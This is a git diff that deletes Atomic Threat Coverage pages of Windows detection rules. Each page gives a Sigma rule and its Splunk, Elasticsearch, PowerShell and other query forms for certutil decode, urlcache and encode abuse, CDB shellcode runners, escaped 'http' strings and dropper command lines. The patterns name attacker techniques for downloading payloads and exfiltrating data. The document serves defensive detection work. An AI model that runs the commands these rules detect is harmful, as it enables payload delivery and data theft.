-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:*\\\\cdb.exe AND winlog.event_data.CommandLine.keyword:*\\-cf*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Possible App Whitelisting Bypass via WinDbg/CDB as a Shellcode Runner'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:*\\cdb.exe AND CommandLine.keyword:*\-cf*)
-```
-
-
-### splunk
-    
-```
-(Image="*\\cdb.exe" CommandLine="*-cf*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\cdb.exe" CommandLine="*-cf*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*\cdb\.exe)(?=.*.*-cf.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_certutil_command.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_certutil_command.md
deleted file mode 100644
index 043e135..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_certutil_command.md
+++ /dev/null
@@ -1,203 +0,0 @@
-| Title                    | Suspicious Certutil Command       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code with the built-in certutil utility |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1140: Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)</li><li>[T1105: Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1140: Deobfuscate/Decode Files or Information](../Triggers/T1140.md)</li><li>[T1105: Ingress Tool Transfer](../Triggers/T1105.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>False positives depend on scripts and administrative tools used in the monitored environment</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/JohnLaTwC/status/835149808817991680](https://twitter.com/JohnLaTwC/status/835149808817991680)</li><li>[https://twitter.com/subTee/status/888102593838362624](https://twitter.com/subTee/status/888102593838362624)</li><li>[https://twitter.com/subTee/status/888071631528235010](https://twitter.com/subTee/status/888071631528235010)</li><li>[https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/](https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/)</li><li>[https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/](https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/)</li><li>[https://twitter.com/egre55/status/1087685529016193025](https://twitter.com/egre55/status/1087685529016193025)</li><li>[https://lolbas-project.github.io/lolbas/Binaries/Certutil/](https://lolbas-project.github.io/lolbas/Binaries/Certutil/)</li></ul>  |
-| **Author**               | Florian Roth, juju4, keepwatch |
-| Other Tags           | <ul><li>attack.s0189</li><li>attack.g0007</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Certutil Command
-id: e011a729-98a6-4139-b5c4-bf6f6dd8239a
-status: experimental
-description: Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code with
-    the built-in certutil utility
-author: Florian Roth, juju4, keepwatch
-modified: 2019/01/22
-date: 2019/01/16
-references:
-    - https://twitter.com/JohnLaTwC/status/835149808817991680
-    - https://twitter.com/subTee/status/888102593838362624
-    - https://twitter.com/subTee/status/888071631528235010
-    - https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/
-    - https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/
-    - https://twitter.com/egre55/status/1087685529016193025
-    - https://lolbas-project.github.io/lolbas/Binaries/Certutil/
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine:
-            - '* -decode *'
-            - '* /decode *'
-            - '* -decodehex *'
-            - '* /decodehex *'
-            - '* -urlcache *'
-            - '* /urlcache *'
-            - '* -verifyctl *'
-            - '* /verifyctl *'
-            - '* -encode *'
-            - '* /encode *'
-            - '*certutil* -URL*'
-            - '*certutil* /URL*'
-            - '*certutil* -ping*'
-            - '*certutil* /ping*'
-    condition: selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-tags:
-    - attack.defense_evasion
-    - attack.t1140
-    - attack.t1105
-    - attack.s0189
-    - attack.g0007
-falsepositives:
-    - False positives depend on scripts and administrative tools used in the monitored environment
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.* -decode .*" -or $_.message -match "CommandLine.*.* /decode .*" -or $_.message -match "CommandLine.*.* -decodehex .*" -or $_.message -match "CommandLine.*.* /decodehex .*" -or $_.message -match "CommandLine.*.* -urlcache .*" -or $_.message -match "CommandLine.*.* /urlcache .*" -or $_.message -match "CommandLine.*.* -verifyctl .*" -or $_.message -match "CommandLine.*.* /verifyctl .*" -or $_.message -match "CommandLine.*.* -encode .*" -or $_.message -match "CommandLine.*.* /encode .*" -or $_.message -match "CommandLine.*.*certutil.* -URL.*" -or $_.message -match "CommandLine.*.*certutil.* /URL.*" -or $_.message -match "CommandLine.*.*certutil.* -ping.*" -or $_.message -match "CommandLine.*.*certutil.* /ping.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(*\ \-decode\ * OR *\ \/decode\ * OR *\ \-decodehex\ * OR *\ \/decodehex\ * OR *\ \-urlcache\ * OR *\ \/urlcache\ * OR *\ \-verifyctl\ * OR *\ \/verifyctl\ * OR *\ \-encode\ * OR *\ \/encode\ * OR *certutil*\ \-URL* OR *certutil*\ \/URL* OR *certutil*\ \-ping* OR *certutil*\ \/ping*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/e011a729-98a6-4139-b5c4-bf6f6dd8239a <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Certutil Command",
-    "description": "Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code with the built-in certutil utility",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1140",
-      "attack.t1105",
-      "attack.s0189",
-      "attack.g0007"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(*\\ \\-decode\\ * OR *\\ \\/decode\\ * OR *\\ \\-decodehex\\ * OR *\\ \\/decodehex\\ * OR *\\ \\-urlcache\\ * OR *\\ \\/urlcache\\ * OR *\\ \\-verifyctl\\ * OR *\\ \\/verifyctl\\ * OR *\\ \\-encode\\ * OR *\\ \\/encode\\ * OR *certutil*\\ \\-URL* OR *certutil*\\ \\/URL* OR *certutil*\\ \\-ping* OR *certutil*\\ \\/ping*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(*\\ \\-decode\\ * OR *\\ \\/decode\\ * OR *\\ \\-decodehex\\ * OR *\\ \\/decodehex\\ * OR *\\ \\-urlcache\\ * OR *\\ \\/urlcache\\ * OR *\\ \\-verifyctl\\ * OR *\\ \\/verifyctl\\ * OR *\\ \\-encode\\ * OR *\\ \\/encode\\ * OR *certutil*\\ \\-URL* OR *certutil*\\ \\/URL* OR *certutil*\\ \\-ping* OR *certutil*\\ \\/ping*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Certutil Command'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(* \-decode * * \/decode * * \-decodehex * * \/decodehex * * \-urlcache * * \/urlcache * * \-verifyctl * * \/verifyctl * * \-encode * * \/encode * *certutil* \-URL* *certutil* \/URL* *certutil* \-ping* *certutil* \/ping*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="* -decode *" OR CommandLine="* /decode *" OR CommandLine="* -decodehex *" OR CommandLine="* /decodehex *" OR CommandLine="* -urlcache *" OR CommandLine="* /urlcache *" OR CommandLine="* -verifyctl *" OR CommandLine="* /verifyctl *" OR CommandLine="* -encode *" OR CommandLine="* /encode *" OR CommandLine="*certutil* -URL*" OR CommandLine="*certutil* /URL*" OR CommandLine="*certutil* -ping*" OR CommandLine="*certutil* /ping*") | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["* -decode *", "* /decode *", "* -decodehex *", "* /decodehex *", "* -urlcache *", "* /urlcache *", "* -verifyctl *", "* /verifyctl *", "* -encode *", "* /encode *", "*certutil* -URL*", "*certutil* /URL*", "*certutil* -ping*", "*certutil* /ping*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.* -decode .*|.*.* /decode .*|.*.* -decodehex .*|.*.* /decodehex .*|.*.* -urlcache .*|.*.* /urlcache .*|.*.* -verifyctl .*|.*.* /verifyctl .*|.*.* -encode .*|.*.* /encode .*|.*.*certutil.* -URL.*|.*.*certutil.* /URL.*|.*.*certutil.* -ping.*|.*.*certutil.* /ping.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_certutil_encode.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_certutil_encode.md
deleted file mode 100644
index 7b48a49..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_certutil_encode.md
+++ /dev/null
@@ -1,171 +0,0 @@
-| Title                    | Certutil Encode       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious a certutil command that used to encode files, which is sometimes used for data exfiltration |
-| **ATT&amp;CK Tactic**    |   This Detection Rule wasn't mapped to ATT&amp;CK Tactic yet  |
-| **ATT&amp;CK Technique** |  This Detection Rule wasn't mapped to ATT&amp;CK Technique yet  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil)</li><li>[https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/](https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Certutil Encode
-id: e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a
-status: experimental
-description: Detects suspicious a certutil command that used to encode files, which is sometimes used for data exfiltration
-references:
-    - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil
-    - https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/
-author: Florian Roth
-date: 2019/02/24
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine:
-            - certutil -f -encode *
-            - certutil.exe -f -encode *
-            - certutil -encode -f *
-            - certutil.exe -encode -f *
-    condition: selection
-falsepositives:
-    - unknown
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*certutil -f -encode .*" -or $_.message -match "CommandLine.*certutil.exe -f -encode .*" -or $_.message -match "CommandLine.*certutil -encode -f .*" -or $_.message -match "CommandLine.*certutil.exe -encode -f .*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(certutil\ \-f\ \-encode\ * OR certutil.exe\ \-f\ \-encode\ * OR certutil\ \-encode\ \-f\ * OR certutil.exe\ \-encode\ \-f\ *)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a <<EOF
-{
-  "metadata": {
-    "title": "Certutil Encode",
-    "description": "Detects suspicious a certutil command that used to encode files, which is sometimes used for data exfiltration",
-    "tags": "",
-    "query": "winlog.event_data.CommandLine.keyword:(certutil\\ \\-f\\ \\-encode\\ * OR certutil.exe\\ \\-f\\ \\-encode\\ * OR certutil\\ \\-encode\\ \\-f\\ * OR certutil.exe\\ \\-encode\\ \\-f\\ *)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(certutil\\ \\-f\\ \\-encode\\ * OR certutil.exe\\ \\-f\\ \\-encode\\ * OR certutil\\ \\-encode\\ \\-f\\ * OR certutil.exe\\ \\-encode\\ \\-f\\ *)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Certutil Encode'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(certutil \-f \-encode * certutil.exe \-f \-encode * certutil \-encode \-f * certutil.exe \-encode \-f *)
-```
-
-
-### splunk
-    
-```
-(CommandLine="certutil -f -encode *" OR CommandLine="certutil.exe -f -encode *" OR CommandLine="certutil -encode -f *" OR CommandLine="certutil.exe -encode -f *")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["certutil -f -encode *", "certutil.exe -f -encode *", "certutil -encode -f *", "certutil.exe -encode -f *"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*certutil -f -encode .*|.*certutil\.exe -f -encode .*|.*certutil -encode -f .*|.*certutil\.exe -encode -f .*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_cli_escape.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_cli_escape.md
deleted file mode 100644
index b639ce0..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_cli_escape.md
+++ /dev/null
@@ -1,180 +0,0 @@
-| Title                    | Suspicious Commandline Escape       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious process that use escape characters |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1140: Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1140: Deobfuscate/Decode Files or Information](../Triggers/T1140.md)</li></ul>  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>False positives depend on scripts and administrative tools used in the monitored environment</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://twitter.com/vysecurity/status/885545634958385153](https://twitter.com/vysecurity/status/885545634958385153)</li><li>[https://twitter.com/Hexacorn/status/885553465417756673](https://twitter.com/Hexacorn/status/885553465417756673)</li><li>[https://twitter.com/Hexacorn/status/885570278637678592](https://twitter.com/Hexacorn/status/885570278637678592)</li><li>[https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html](https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html)</li><li>[http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/](http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/)</li></ul>  |
-| **Author**               | juju4 |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Commandline Escape
-id: f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd
-description: Detects suspicious process that use escape characters
-status: experimental
-references:
-    - https://twitter.com/vysecurity/status/885545634958385153
-    - https://twitter.com/Hexacorn/status/885553465417756673
-    - https://twitter.com/Hexacorn/status/885570278637678592
-    - https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html
-    - http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/
-author: juju4
-date: 2018/12/11
-modified: 2020/03/14
-tags:
-    - attack.defense_evasion
-    - attack.t1140
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine:
-            # - <TAB>   # no TAB modifier in sigmac yet, so this matches <TAB> (or TAB in elasticsearch backends without DSL queries)
-            - '*h^t^t^p*'
-            - '*h"t"t"p*'
-    condition: selection
-falsepositives:
-    - False positives depend on scripts and administrative tools used in the monitored environment
-level: low
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.*h^t^t^p.*" -or $_.message -match "CommandLine.*.*h\"t\"t\"p.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(*h\^t\^t\^p* OR *h\"t\"t\"p*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Commandline Escape",
-    "description": "Detects suspicious process that use escape characters",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1140"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(*h\\^t\\^t\\^p* OR *h\\\"t\\\"t\\\"p*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(*h\\^t\\^t\\^p* OR *h\\\"t\\\"t\\\"p*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Commandline Escape'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(*h\^t\^t\^p* *h\"t\"t\"p*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="*h^t^t^p*" OR CommandLine="*h\"t\"t\"p*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["*h^t^t^p*", "*h\"t\"t\"p*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.*h\^t\^t\^p.*|.*.*h"t"t"p.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_cmd_http_appdata.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_cmd_http_appdata.md
deleted file mode 100644
index 85f15a2..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_cmd_http_appdata.md
+++ /dev/null
@@ -1,182 +0,0 @@
-| Title                    | Command Line Execution with Suspicious URL and AppData Strings       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell) |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1059: Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>High</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100](https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100)</li><li>[https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100](https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1059.005</li><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Command Line Execution with Suspicious URL and AppData Strings
-id: 1ac8666b-046f-4201-8aba-1951aaec03a3
-status: experimental
-description: Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)
-references:
-    - https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100
-    - https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100
-author: Florian Roth
-date: 2019/01/16
-tags:
-    - attack.execution
-    - attack.t1059
-    - attack.t1059.005
-    - attack.t1059.001
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine:
-            - cmd.exe /c *http://*%AppData%
-            - cmd.exe /c *https://*%AppData%
-    condition: selection
-fields:
-    - CommandLine
-    - ParentCommandLine
-falsepositives:
-    - High
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*cmd.exe /c .*http://.*%AppData%" -or $_.message -match "CommandLine.*cmd.exe /c .*https://.*%AppData%")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(cmd.exe\ \/c\ *http\:\/\/*%AppData% OR cmd.exe\ \/c\ *https\:\/\/*%AppData%)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/1ac8666b-046f-4201-8aba-1951aaec03a3 <<EOF
-{
-  "metadata": {
-    "title": "Command Line Execution with Suspicious URL and AppData Strings",
-    "description": "Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)",
-    "tags": [
-      "attack.execution",
-      "attack.t1059",
-      "attack.t1059.005",
-      "attack.t1059.001"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(cmd.exe\\ \\/c\\ *http\\:\\/\\/*%AppData% OR cmd.exe\\ \\/c\\ *https\\:\\/\\/*%AppData%)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(cmd.exe\\ \\/c\\ *http\\:\\/\\/*%AppData% OR cmd.exe\\ \\/c\\ *https\\:\\/\\/*%AppData%)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Command Line Execution with Suspicious URL and AppData Strings'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n      CommandLine = {{_source.CommandLine}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(cmd.exe \/c *http\:\/\/*%AppData% cmd.exe \/c *https\:\/\/*%AppData%)
-```
-
-
-### splunk
-    
-```
-(CommandLine="cmd.exe /c *http://*%AppData%" OR CommandLine="cmd.exe /c *https://*%AppData%") | table CommandLine,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["cmd.exe /c *http://*%AppData%", "cmd.exe /c *https://*%AppData%"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*cmd\.exe /c .*http://.*%AppData%|.*cmd\.exe /c .*https://.*%AppData%)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_codeintegrity_check_failure.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_codeintegrity_check_failure.md
deleted file mode 100644
index 98bb262..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_codeintegrity_check_failure.md
+++ /dev/null
@@ -1,174 +0,0 @@
-| Title                    | Failed Code Integrity Checks       |
-|:-------------------------|:------------------|
-| **Description**          | Code integrity failures may indicate tampered executables. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
